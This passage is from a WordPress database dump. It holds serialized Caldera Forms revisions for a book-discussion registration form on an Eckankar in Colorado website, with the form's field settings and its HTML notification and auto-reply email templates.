16px; color: #4c4747;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Thank you for signing up for one of our ECK Book Discussion Classes. We look forward to meeting you! Below is the information that you have submitted to us, which will only be used to respond to your request.</p>\n</td>\n</tr>\n<tr>\n<td bgcolor=\"#ffffff\" align=\"left\">\n<table style=\"width: 100%; height: 25px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr style=\"height: 62px;\">\n<td style=\"padding: 22px 30px; height: 25px; border-top: solid 2px #ccc; border-bottom: solid 2px #ccc;\" bgcolor=\"#EBEBEB\" align=\"left; padding-top: 25px; padding-bottom: 15px;\">\n<table style=\"color: #4c4747; font-family: Open Sans; font-weight: 400; font-size: 16px; line-height: 12px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"border-radius: 3px; text-align: left;\" bgcolor=\"#EBEBEB\" align=\"left\">{summary}</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 30px 30px 30px 30px; border-radius: 4px 4px 4px 4px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#FFECD1\" align=\"center\">\n<p class=\"\" style=\"font-size: 17px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; color: #6b6b6b;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">You are receiving this email because you have submitted a request through the Eckankar in Colorado website.</p>\n<p class=\"\" style=\"font-size: 17px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; color: #6b6b6b;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">If you have any questions regarding the origin of this form, please feel free to get in touch — we\'re always happy to help out.</p>\n<p class=\"\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"\" style=\"font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; font-size: 17px;\" href=\"mailto:webmaster@eckankar-colorado.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">Contact Us</a></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\";}s:10:\"conditions\";a:2:{s:4:\"type\";s:0:\"\";s:5:\"group\";a:0:{}}}}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:18:\"conditional_groups\";a:1:{s:10:\"conditions\";a:0:{}}s:24:\"privacy_exporter_enabled\";b:0;s:7:\"version\";s:5:\"1.9.4\";}'),(34,'CF60874262a3d99','revision','a:22:{s:2:\"ID\";s:15:\"CF60874262a3d99\";s:13:\"_last_updated\";s:31:\"Tue, 27 Apr 2021 18:34:18 +0000\";s:10:\"cf_version\";s:5:\"1.9.4\";s:4:\"name\";s:28:\"Book Discussion Registration\";s:10:\"scroll_top\";i:1;s:7:\"success\";s:140:\"<center>Thank you for your interest in joining an ECK Book Discussion!<br>\nYou will be contacted soon regarding the class.</center>									\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:12:\"avatar_field\";s:11:\"fld_6009157\";s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:7:{s:9:\"fld_29462\";s:3:\"1:1\";s:11:\"fld_8768091\";s:3:\"2:1\";s:11:\"fld_9970286\";s:3:\"2:2\";s:11:\"fld_6009157\";s:3:\"3:1\";s:11:\"fld_3657255\";s:3:\"3:2\";s:11:\"fld_7683514\";s:3:\"4:1\";s:11:\"fld_7908577\";s:3:\"5:1\";}s:9:\"structure\";s:16:\"12|6:6|6:6|12|12\";}s:6:\"fields\";a:7:{s:9:\"fld_29462\";a:7:{s:2:\"ID\";s:9:\"fld_29462\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:6:\"header\";s:4:\"slug\";s:6:\"header\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:109:\"<h2>ECK Book Discussion Registration</h2>\nYour information will only be used to respond to your request.\n<hr>\";}}s:11:\"fld_8768091\";a:8:{s:2:\"ID\";s:11:\"fld_8768091\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:10:\"First Name\";s:4:\"slug\";s:10:\"first_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_9970286\";a:8:{s:2:\"ID\";s:11:\"fld_9970286\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:9:\"Last Name\";s:4:\"slug\";s:9:\"last_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_6009157\";a:8:{s:2:\"ID\";s:11:\"fld_6009157\";s:4:\"type\";s:5:\"email\";s:5:\"label\";s:13:\"Email Address\";s:4:\"slug\";s:13:\"email_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_3657255\";a:8:{s:2:\"ID\";s:11:\"fld_3657255\";s:4:\"type\";s:5:\"phone\";s:5:\"label\";s:5:\"Phone\";s:4:\"slug\";s:5:\"phone\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"local\";s:6:\"custom\";s:13:\"(999)999-9999\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7683514\";a:8:{s:2:\"ID\";s:11:\"fld_7683514\";s:4:\"type\";s:9:\"paragraph\";s:5:\"label\";s:20:\"Comments / Questions\";s:4:\"slug\";s:18:\"comments_questions\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:4:\"rows\";i:7;s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7908577\";a:7:{s:2:\"ID\";s:11:\"fld_7908577\";s:4:\"type\";s:6:\"button\";s:5:\"label\";s:12:\"Send Message\";s:4:\"slug\";s:6:\"submit\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:4:{s:12:\"custom_class\";s:0:\"\";s:4:\"type\";s:6:\"submit\";s:5:\"class\";s:15:\"btn btn-default\";s:6:\"target\";s:0:\"\";}}}s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:6:\"mailer\";a:9:{s:9:\"on_insert\";i:1;s:11:\"sender_name\";s:26:\"Caldera Forms Notification\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:10:\"email_type\";s:4:\"html\";s:10:\"recipients\";s:15:\"%email_address%\";s:6:\"bcc_to\";s:0:\"\";s:13:\"email_subject\";s:20:\"Book Discussion Form\";s:13:\"email_message\";s:8215:\"<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<p>\n<style type=\"text/css\">\n        @media screen {<br />\n            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Regular\'), local(\'Lato-Regular\'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold\'), local(\'Lato-Bold\'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Italic\'), local(\'Lato-Italic\'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold Italic\'), local(\'Lato-BoldItalic\'), url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format(\'woff\');<br />\n            }<br />\n        }</p>\n<p>        /* CLIENT-SPECIFIC STYLES */<br />\n        body,<br />\n        table,<br />\n        td,<br />\n        a {<br />\n            -webkit-text-size-adjust: 100%;<br />\n            -ms-text-size-adjust: 100%;<br />\n        }</p>\n<p>        table,<br />\n        td {<br />\n            mso-table-lspace: 0pt;<br />\n            mso-table-rspace: 0pt;<br />\n        }</p>\n<p>        img {<br />\n            -ms-interpolation-mode: bicubic;<br />\n        }</p>\n<p>        /* RESET STYLES */<br />\n        img {<br />\n            border: 0;<br />\n            height: auto;<br />\n            line-height: 100%;<br />\n            outline: none;<br />\n            text-decoration: none;<br />\n        }</p>\n<p>        table {<br />\n            border-collapse: collapse !important;<br />\n        }</p>\n<p>        body {<br />\n            height: 100% !important;<br />\n            margin: 0 !important;<br />\n            padding: 0 !important;<br />\n            width: 100% !important;<br />\n        }</p>\n<p>        /* iOS BLUE LINKS */<br />\n        a[x-apple-data-detectors] {<br />\n            color: inherit !important;<br />\n            text-decoration: none !important;<br />\n            font-size: inherit !important;<br />\n            font-family: inherit !important;<br />\n            font-weight: inherit !important;<br />\n            line-height: inherit !important;<br />\n        }</p>\n<p>        /* MOBILE STYLES */<br />\n        @media screen and (max-width:600px) {<br />\n            h1 {<br />\n                font-size: 32px !important;<br />\n                line-height: 32px !important;<br />\n            }<br />\n        }</p>\n<p>        /* ANDROID CENTER FIX */<br />\n        div[style*=\"margin: 16px 0;\"] {<br />\n            margin: 0 !important;<br />\n        }<br />\n    </style>\n</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><!-- LOGO -->\n<tbody>\n<tr>\n<td bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 10px 40px 10px;\" valign=\"top\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px; border-bottom: solid 4px #23507d;\" valign=\"top\" bgcolor=\"#ffffff\" align=\"center;\">\n<h1 class=\"\" style=\"font-family: \'Bitter\', Georgia, Times, \'Times New Roman\', serif; font-size: 47px; font-weight: normal; letter-spacing: normal; color: #1d5791; text-transform: capitalize; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Eckankar In Colorado</h1>\n<p class=\"color3-color\" style=\"font-size: 25px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 600; text-align: center; letter-spacing: 3px; border: 2px solid #954c08; background-color: #ffffff;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"600\" data-font-style=\"\"><strong>New Admin Web Submission</strong></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-weight: 400; width: 62.6951%; height: 357px;\" data-font-weight=\"400\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr style=\"height: 82px;\">\n<td style=\"padding: 20px 30px 25px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px; height: 82px;\" bgcolor=\"#ebebeb\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 23px; text-align: center; color: #954c08;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Book Discussion - Registration Request</p>\n</td>\n</tr>\n<tr style=\"height: 169px;\">\n<td style=\"padding: 20px 30px 15px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px; height: 169px;\" bgcolor=\"#ffffff\" align=\"left\">\n<p class=\"color3-color\" style=\"font-size: 18px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">You have a new<strong><em> Book Discussion</em> </strong>form submission.</p>\n<p class=\"\" style=\"font-size: 15px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">A user on the <i><strong>Eckankar In Colorado</strong></i> website has submitted this form. The following person has requested contact with an ECK representative.</p>\n</td>\n</tr>\n<tr style=\"height: 106px;\">\n<td style=\"height: 106px;\" bgcolor=\"#ffffff\" align=\"left\">\n<table style=\"width: 100%; height: 25px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr style=\"height: 62px;\">\n<td style=\"padding: 22px 30px; height: 25px; border-top: solid 2px #ccc; border-bottom: solid 2px #ccc;\" bgcolor=\"#EBEBEB\" align=\"left; padding-top: 25px; padding-bottom: 15px;\">\n<table style=\"color: #4c4747; font-family: Open Sans; font-weight: 400; font-size: 16px; line-height: 12px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"border-radius: 3px; text-align: left;\" bgcolor=\"#EBEBEB\" align=\"left\">{summary}</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 30px 30px 30px 30px; border-radius: 4px 4px 4px 4px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#FFECD1\" align=\"center\">If you have any questions regarding the origin of this form, please feel free to contact the <a href=\"https://www.eckankar-colorado.org\">Eckankar In Colorado </a>webmaster: webmaster@eckankar-colorado.org</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\";}s:10:\"processors\";a:1:{s:11:\"fp_17689566\";a:5:{s:2:\"ID\";s:11:\"fp_17689566\";s:8:\"runtimes\";a:1:{s:6:\"insert\";i:1;}s:4:\"type\";s:14:\"auto_responder\";s:6:\"config\";a:9:{s:11:\"sender_name\";s:20:\"Eckankar In Colorado\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:7:\"subject\";s:27:\"Thank you for contacting us\";s:14:\"recipient_name\";s:24:\"%first_name% %last_name%\";s:15:\"recipient_email\";s:15:\"%email_address%\";s:7:\"message\";s:8908:\"<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<p>\n<style type=\"text/css\">\n        @media screen {<br />\n            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Regular\'), local(\'Lato-Regular\'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold\'), local(\'Lato-Bold\'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Italic\'), local(\'Lato-Italic\'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold Italic\'), local(\'Lato-BoldItalic\'), url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format(\'woff\');<br />\n            }<br />\n        }</p>\n<p>        /* CLIENT-SPECIFIC STYLES */<br />\n        body,<br />\n        table,<br />\n        td,<br />\n        a {<br />\n            -webkit-text-size-adjust: 100%;<br />\n            -ms-text-size-adjust: 100%;<br />\n        }</p>\n<p>        table,<br />\n        td {<br />\n            mso-table-lspace: 0pt;<br />\n            mso-table-rspace: 0pt;<br />\n        }</p>\n<p>        img {<br />\n            -ms-interpolation-mode: bicubic;<br />\n        }</p>\n<p>        /* RESET STYLES */<br />\n        img {<br />\n            border: 0;<br />\n            height: auto;<br />\n            line-height: 100%;<br />\n            outline: none;<br />\n            text-decoration: none;<br />\n        }</p>\n<p>        table {<br />\n            border-collapse: collapse !important;<br />\n        }</p>\n<p>        body {<br />\n            height: 100% !important;<br />\n            margin: 0 !important;<br />\n            padding: 0 !important;<br />\n            width: 100% !important;<br />\n        }</p>\n<p>        /* iOS BLUE LINKS */<br />\n        a[x-apple-data-detectors] {<br />\n            color: inherit !important;<br />\n            text-decoration: none !important;<br />\n            font-size: inherit !important;<br />\n            font-family: inherit !important;<br />\n            font-weight: inherit !important;<br />\n            line-height: inherit !important;<br />\n        }</p>\n<p>        /* MOBILE STYLES */<br />\n        @media screen and (max-width:600px) {<br />\n            h1 {<br />\n                font-size: 32px !important;<br />\n                line-height: 32px !important;<br />\n            }<br />\n        }</p>\n<p>        /* ANDROID CENTER FIX */<br />\n        div[style*=\"margin: 16px 0;\"] {<br />\n            margin: 0 !important;<br />\n        }<br />\n    </style>\n</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><!-- LOGO -->\n<tbody>\n<tr>\n<td bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 10px 40px 10px;\" valign=\"top\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px; border-bottom: solid 4px #23507d;\" valign=\"top\" bgcolor=\"#ffffff\" align=\"center;\">\n<h1 class=\"\" style=\"font-family: \'Bitter\', Georgia, Times, \'Times New Roman\', serif; font-size: 47px; font-weight: normal; letter-spacing: normal; color: #1d5791; text-transform: capitalize; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Eckankar In Colorado</h1>\n<p class=\"\" style=\"font-size: 20px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 600; text-align: center; letter-spacing: 3px; color: #6b6b6b; border: 2px solid #ebebeb; background-color: #e8f2fc;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"600\" data-font-style=\"\">About Your Web Submission Request</p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-weight: 400;\" data-font-weight=\"400\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 20px 30px 25px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ebebeb\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 23px; text-align: center; color: #954c08;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Book Discussion Registration Confirmation</p>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 20px 30px 15px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ffffff\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 18px; color: #4c4747; line-height: 31px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Hello %first_name%!</p>\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 400; font-size: 16px; color: #4c4747;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Thank you for signing up for one of our ECK Book Discussion Classes. We look forward to meeting you! Below is the information that you have submitted to us, which will only be used to respond to your request.</p>\n</td>\n</tr>\n<tr>\n<td bgcolor=\"#ffffff\" align=\"left\">\n<table style=\"width: 100%; height: 25px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr style=\"height: 62px;\">\n<td style=\"padding: 22px 30px; height: 25px; border-top: solid 2px #ccc; border-bottom: solid 2px #ccc;\" bgcolor=\"#EBEBEB\" align=\"left; padding-top: 25px; padding-bottom: 15px;\">\n<table style=\"color: #4c4747; font-family: Open Sans; font-weight: 400; font-size: 16px; line-height: 12px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"border-radius: 3px; text-align: left;\" bgcolor=\"#EBEBEB\" align=\"left\">{summary}</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 30px 30px 30px 30px; border-radius: 4px 4px 4px 4px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#FFECD1\" align=\"center\">\n<p class=\"\" style=\"font-size: 17px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; color: #6b6b6b;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">You are receiving this email because you have submitted a request through the Eckankar in Colorado website.</p>\n<p class=\"\" style=\"font-size: 17px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; color: #6b6b6b;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">If you have any questions regarding the origin of this form, please feel free to get in touch — we\'re always happy to help out.</p>\n<p class=\"\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"\" style=\"font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; font-size: 17px;\" href=\"mailto:webmaster@eckankar-colorado.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">Contact Us</a></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\";}s:10:\"conditions\";a:2:{s:4:\"type\";s:0:\"\";s:5:\"group\";a:0:{}}}}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:18:\"conditional_groups\";a:1:{s:10:\"conditions\";a:0:{}}s:24:\"privacy_exporter_enabled\";b:0;s:7:\"version\";s:5:\"1.9.4\";}'),(35,'CF60874262a3d99','revision','a:22:{s:2:\"ID\";s:15:\"CF60874262a3d99\";s:13:\"_last_updated\";s:31:\"Tue, 27 Apr 2021 18:38:18 +0000\";s:10:\"cf_version\";s:5:\"1.9.4\";s:4:\"name\";s:28:\"Book Discussion Registration\";s:10:\"scroll_top\";i:1;s:7:\"success\";s:140:\"<center>Thank you for your interest in joining an ECK Book Discussion!<br>\nYou will be contacted soon regarding the class.</center>									\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:12:\"avatar_field\";s:11:\"fld_6009157\";s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:7:{s:9:\"fld_29462\";s:3:\"1:1\";s:11:\"fld_8768091\";s:3:\"2:1\";s:11:\"fld_9970286\";s:3:\"2:2\";s:11:\"fld_6009157\";s:3:\"3:1\";s:11:\"fld_3657255\";s:3:\"3:2\";s:11:\"fld_7683514\";s:3:\"4:1\";s:11:\"fld_7908577\";s:3:\"5:1\";}s:9:\"structure\";s:16:\"12|6:6|6:6|12|12\";}s:6:\"fields\";a:7:{s:9:\"fld_29462\";a:7:{s:2:\"ID\";s:9:\"fld_29462\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:6:\"header\";s:4:\"slug\";s:6:\"header\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:109:\"<h2>ECK Book Discussion Registration</h2>\nYour information will only be used to respond to your request.\n<hr>\";}}s:11:\"fld_8768091\";a:8:{s:2:\"ID\";s:11:\"fld_8768091\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:10:\"First 